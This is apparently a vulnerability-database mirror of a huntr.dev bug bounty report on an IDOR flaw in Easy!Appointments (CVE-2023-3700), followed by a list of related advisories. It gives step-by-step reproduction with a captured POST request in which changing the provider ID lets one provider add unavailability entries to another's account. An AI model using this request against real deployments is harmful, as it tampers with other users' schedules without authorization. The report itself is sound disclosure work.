Lucene search
LujiefsiE8D530DB-A6A7-4F79-A95D-B77654CC04F8HistoryJun 05, 2023 - 8:52 a.m.
IDOR can make attackers add or close others' unavaiable
2023-06-0508:52:29
lujiefsi
www.huntr.dev
6
idor
security
unavailability
authorization
vulnerability
csrf token
bug bounty
EPSS
0.001
Percentile
23.8%
both user1 and user2 are Providers
1 user1 login and add unavaiable
2 request can be like
POST /index.php/backend_api/ajax_save_unavailable HTTP/1.1
.....
csrfToken=d0a4805b08a205bfd5cf112137b21585&unavailable=%7B%22start_datetime%22%3A%222023-06-07+01%3A45%22%2C%22end_datetime%22%3A%222023-06-07+02%3A45%22%2C%22notes%22%3A%22%22%2C%22id_users_provider%22%3A%229%22%7D
3 id_users_provider%22%3A%229%22%7D means id_users_provideer=9
4 we change the id as 10, i…e user2
5 send the request, then we find that user2 owns an unavailable
Related
cve
cve
CVE-2023-3700
2023-07-17 07:15:09
osv
osv
Easy!Appointments Improper Access Control vulnerability
2023-07-17 09:30:23
CVE-2023-3700
2023-07-17 07:15:09
prion
prion
Authorization
2023-07-17 07:15:00
github
github
Easy!Appointments Improper Access Control vulnerability
2023-07-17 09:30:23
gitlab
gitlab
Authorization Bypass Through User-Controlled Key
2023-07-17 00:00:00
cvelist
cvelist
veracode
veracode
Improper Access Control
2023-07-19 06:26:53
nvd
nvd
CVE-2023-3700
2023-07-17 07:15:09